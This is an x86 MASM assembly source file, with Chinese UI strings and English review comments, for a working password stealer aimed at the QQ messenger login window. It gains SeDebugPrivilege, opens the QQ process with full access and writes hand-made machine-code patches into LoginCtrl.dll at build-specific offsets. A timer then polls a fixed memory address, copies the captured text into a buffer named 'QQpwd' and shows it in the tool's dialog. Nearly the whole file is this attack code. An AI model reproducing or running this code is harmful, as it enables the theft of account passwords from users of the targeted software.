		.386
		.model flat, stdcall
		option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include		windows.inc
include		user32.inc
includelib	user32.lib
include		kernel32.inc
includelib	kernel32.lib
include		advapi32.inc
includelib	advapi32.lib
include		comctl32.inc
includelib	comctl32.lib
include		psapi.inc              
includelib	psapi.lib




; Dialog-resource and control identifiers. They must agree with the .rc
; template that defines DLG_MAIN, which is not part of this file.
ID_TIMER1    equ    10
DLG_MAIN    equ   101
IDC_EDT1        equ     1001
ICO_MAIN     equ    99
IDC_btExit    equ    1000
; ID_TIMER1 and ICO_MAIN are not referenced anywhere in this file.
.data
; Two-byte fingerprints. _ProcTimer reads 2 bytes from the target module
; and compares them with these to decide which patch set (if any) applies.
db2007        db        8Dh,45h
db2008        db        6Ch,88h    
; Opaque machine-code byte strings that _ProcTimer copies verbatim into
; another process with WriteProcessMemory. They are hand-made for the two
; fingerprinted builds and only make sense together with the hard-coded
; offsets in _ProcTimer; nothing in this file decodes or validates them.
dbPatched1    db        0E9h,4Fh,24h,01h,00h,90h,90h,90h,90h,90h
dbPatched2    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 9Bh, 0DBh, 0FEh, 0FFh, 90h
dbPatched3    db        0E9h, 0E5h, 34h, 01h, 00h, 90h, 90h, 90h, 90h, 90h
dbPatched4    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 05h, 0CBh, 0FEh, 0FFh
; 22 zero bytes; _ProcTimer writes them over the remote buffer at 12B000h
; after each read (16h = 22 bytes).
dbNull        db        00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h 
.const
; Window-title and status strings. They contain non-ASCII text, so their
; byte values depend on the code page the source was saved in; assumed to
; match the ANSI code page of the system FindWindowA runs on - TODO confirm.
szWinName	db	'QQ用户登录',0	; title of the window _ProcTimer looks for
szMsg		db	'QQ已启动',0	; status shown once the window was found
szmodname	db	'LoginCtrl.dll',0	; module name searched for in the Toolhelp snapshot
szznotrun	db	'QQ未运行',0	; status shown when the window is gone
szdebp		db	'SeDebugPrivilege',0	; privilege name passed to _EnablePrivilege
.data?

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data segment (uninitialised)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data?

hInstance        dd        ?	; module handle, set in start
hWinMain        dd        ?	; dialog window; set on WM_INITDIALOG, read by _ProcTimer
idTimer        dd        ?	; SetTimer result; stored, never passed to KillTimer in this file
QQpid        dd        ?	; PID of the process owning the szWinName window
hQQ        dd        ?	; OpenProcess handle to that process; 0 = not attached
modArr        db        1024 dup(?)	; not referenced in this file
dwNumMod    dd        ?	; not referenced in this file
myModule                 MODULEENTRY32  <?>	; record filled by Module32First/Next
hSnapShot    dd        ?	; Toolhelp snapshot handle; never closed in this file
QQpwd        db        22 dup(?)	; ReadProcessMemory receive buffer; _strlen walks it, so a NUL must be inside
dbOldBytes    db        2 dup (?)	; the 2-byte fingerprint read from the remote module
.code
;-----------------------------------------------------------------------
; _strlen - byte length of a NUL-terminated string (C strlen).
; In:    String = pointer to the string; it must contain a NUL, as the
;        scan is effectively unbounded (ecx starts at 0FFFFFFFFh).
; Out:   eax = number of bytes before the NUL (ecx holds the same value)
; Clobb: ecx, flags. edi is saved/restored by 'uses'.
;-----------------------------------------------------------------------
_strlen		proc uses edi String:dword
		mov	edi,String
		xor	eax,eax			; al = 0: the byte to look for
		or	ecx,-1			; ecx = 0FFFFFFFFh, i.e. "no limit"
		repne	scasb			; stops just past the NUL; ecx = -(len+2)
		not	ecx			; -1 - ecx = len+1 (terminator included)
		dec	ecx			; drop the terminator
		mov	eax,ecx
		ret
_strlen		endp

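;-----------------------------------------------------------------------
; _EnablePrivilege - enable or disable one named privilege on the
; current process token (AdjustTokenPrivileges wrapper).
; In:    szPriv = pointer to the privilege name (this file passes szdebp)
;        bFlags = nonzero to enable, zero to disable
; Out:   eax = AdjustTokenPrivileges result; 0 if the token could not be
;        opened or the privilege name could not be looked up.
;        Note: AdjustTokenPrivileges returns nonzero even when the
;        privilege was not granted; a caller that cares must call
;        GetLastError and test for ERROR_NOT_ALL_ASSIGNED.
; Clobb: ecx, edx, flags. ebx is now preserved via 'uses' - the original
;        overwrote it, which breaks the Win32 callee-saved rule for any
;        caller that does not save ebx itself.
;-----------------------------------------------------------------------
_EnablePrivilege	proc uses ebx szPriv:dword,bFlags:dword
			local	hToken:dword
			local	tkp:TOKEN_PRIVILEGES

			; GetCurrentProcess returns a pseudo-handle (no CloseHandle
			; needed). It is parked in ebx because invoke's 'addr' below
			; uses eax to build the pointer argument.
			invoke	GetCurrentProcess
			mov	ebx,eax
			invoke	OpenProcessToken, ebx,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
			.if	!eax
				ret				; no token: eax is already 0
			.endif
			invoke	LookupPrivilegeValue,NULL,szPriv,addr tkp.Privileges.Luid
			.if	!eax
				; unknown privilege name: tkp.Luid is garbage, do not adjust
				invoke	CloseHandle,hToken
				xor	eax,eax
				ret
			.endif
			mov	tkp.PrivilegeCount,1
			xor	eax,eax
			.if	bFlags
				mov	eax,SE_PRIVILEGE_ENABLED
			.endif
			mov	tkp.Privileges.Attributes,eax	; 0 = disable, SE_PRIVILEGE_ENABLED = enable
			invoke	AdjustTokenPrivileges,hToken,FALSE,addr tkp,0,0,0
			push	eax				; keep the result across CloseHandle
			invoke	CloseHandle,hToken
			pop	eax
			ret
_EnablePrivilege	endp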

;-----------------------------------------------------------------------
; _ProcTimer - TIMERPROC callback registered by _ProcDlgMain (1000 ms).
; Two states, selected by hQQ:
;   hQQ == 0 : find the target login window by title, open its process,
;              locate szmodname among its modules and write the patch
;              byte strings into that module's image.
;   hQQ != 0 : poll a fixed address in that process, show whatever is
;              read in the dialog, wipe the remote buffer, and reset hQQ
;              once the window is gone.
; In:    stdcall TIMERPROC arguments; none of them is read.
; Out:   eax unspecified (Windows ignores a TIMERPROC's return value).
; Uses:  ebx = address cursor inside the remote module (saved by 'uses').
; Review notes (defender's view): this is cross-process memory tampering -
;   OpenProcess(PROCESS_ALL_ACCESS) on another PID, Module32First/Next
;   enumeration, Read/WriteProcessMemory into a loaded DLL's image, with
;   SeDebugPrivilege requested beforehand in _ProcDlgMain. The offsets
;   (16396h, 12454h, 0A4Ah, 134EAh) and the absolute address 12B000h are
;   hard-coded for two specific builds chosen by a 2-byte fingerprint
;   (db2007/db2008). The results of OpenProcess, CreateToolhelp32Snapshot,
;   Module32First/Next and Read/WriteProcessMemory are not checked, and
;   neither hSnapShot nor hQQ is ever closed.
;-----------------------------------------------------------------------
_ProcTimer	proc	uses ebx edi esi _hWnd,_uMsg,_idEvent,_dwTime
		.if !hQQ
			; --- state 1: not attached yet ---
			invoke	FindWindowA,NULL,offset szWinName	; is a window titled szWinName present?
			.if eax
				; PID of the owning process -> full-access handle kept in hQQ (result unchecked)
				invoke	GetWindowThreadProcessId,eax,addr QQpid
				invoke	OpenProcess,PROCESS_ALL_ACCESS,FALSE,QQpid
				mov	hQQ,eax
				invoke	SetWindowText,hWinMain,offset szMsg
				; enumerate the modules loaded in that process
				invoke	CreateToolhelp32Snapshot,TH32CS_SNAPALL,QQpid
				mov	hSnapShot,eax
				mov	myModule.dwSize,sizeof myModule
				invoke	Module32First,hSnapShot,addr myModule
				jmp	cmp1
			NextModule:
				invoke	Module32Next,hSnapShot,addr myModule
			cmp1:
				; loop until szModule equals szmodname; only lstrcmp's result ends the loop
				invoke	lstrcmp,addr myModule.szModule,offset szmodname
				cmp	eax,0
				jnz	NextModule

				; fingerprint: the 2 bytes at modBaseAddr+16396h select the patch set
				mov	ebx,myModule.modBaseAddr
				add	ebx,16396h;2008:16de0,200716396
				invoke	ReadProcessMemory,hQQ,ebx,addr dbOldBytes,2,NULL
				mov	ax,word ptr dbOldBytes
				.if ax == word ptr db2007
					; build "2007": two patch writes at fixed offsets, then a 16-byte
					; write to 12B000h (lpBuffer is 0 in this call; the other branches pass addr dbNull)
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched1,10,NULL
					add	ebx,12454h	;2008:134ea,2007:12454h
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched2,28,NULL
					invoke	WriteProcessMemory,hQQ,12B000h,0,16,NULL
				.elseif	ax == word ptr db2008
					; build "2008": same shape, different offsets and byte strings
					add	ebx,0A4Ah
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched3,10,NULL
					add	ebx,134EAh
					invoke	WriteProcessMemory,hQQ,ebx,addr dbPatched4,27,NULL
					invoke	WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL	; zero 16h bytes at the fixed address

				.endif
				; unrecognised fingerprint: nothing is written, but hQQ stays set
			.endif
			.else 
				; --- state 2: attached; poll the fixed address every tick ---
				invoke	ReadProcessMemory,hQQ,12B000h,addr QQpwd,sizeof QQpwd,NULL
				invoke	_strlen,addr QQpwd	; assumes a NUL within the 22 bytes read
				.if eax
					; non-empty: show it in the edit control, then wipe the remote buffer
					invoke	SetDlgItemText,hWinMain,IDC_EDT1,addr QQpwd
					invoke	WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL

				.endif
				; window gone -> forget the handle (not closed) and go back to state 1
				invoke	FindWindowA,NULL,offset szWinName
				.if	!eax
					mov	hQQ,0
					invoke	SetWindowText,hWinMain,offset szznotrun
				.endif
		.endif


		ret
_ProcTimer	endp

;-----------------------------------------------------------------------
; _ProcDlgMain - dialog procedure for DLG_MAIN.
; WM_INITDIALOG does the one-time setup; WM_COMMAND/IDC_btExit and
; WM_CLOSE both end the dialog. Any other message returns FALSE so the
; dialog manager applies its default handling.
; In:    hWnd,wMsg,wParam,lParam (standard DLGPROC)
; Out:   eax = TRUE if the message was handled, FALSE otherwise
;-----------------------------------------------------------------------
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam

        mov    eax,wMsg
        .if    eax == WM_INITDIALOG
            ; remember the dialog window for the timer callback
            mov    eax,hWnd
            mov    hWinMain,eax
            ; 1 s timer with no window: ticks go straight to _ProcTimer
            invoke    SetTimer,NULL,NULL,1000,offset _ProcTimer
            mov    idTimer,eax
            ; ask for the privilege named in szdebp on this process's token;
            ; the result is not checked
            invoke     _EnablePrivilege,offset szdebp, TRUE
            ; display-only edit control; keep the dialog above other windows
            invoke    SendDlgItemMessage,hWnd,IDC_EDT1,EM_SETREADONLY,TRUE,0
            invoke      SetWindowPos,hWnd,HWND_TOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE
        .elseif    eax == WM_COMMAND
            ; low word of wParam carries the control id
            movzx  eax,word ptr wParam
            .if    eax == IDC_btExit
                invoke    EndDialog,hWnd,NULL
            .endif
        .elseif    eax == WM_CLOSE
            invoke    EndDialog,hWnd,NULL
        .else
            xor    eax,eax          ; FALSE: not handled here
            ret
        .endif
        mov    eax,TRUE
        ret

_ProcDlgMain    endp

;-----------------------------------------------------------------------
; Program entry: run the DLG_MAIN dialog modally and exit when it ends.
; _ProcDlgMain is its dialog procedure; DialogBoxParam runs the message
; loop itself, so none is written here.
;-----------------------------------------------------------------------
start:
	invoke	GetModuleHandle,NULL
	push	eax
	pop	hInstance			; hInstance = handle of this module
	invoke	InitCommonControls		; comctl32 initialisation (library linked above)
	invoke	DialogBoxParam,hInstance,DLG_MAIN,NULL,addr _ProcDlgMain,NULL
	invoke	ExitProcess,0			; exit code 0 (same value as NULL)

	end	start
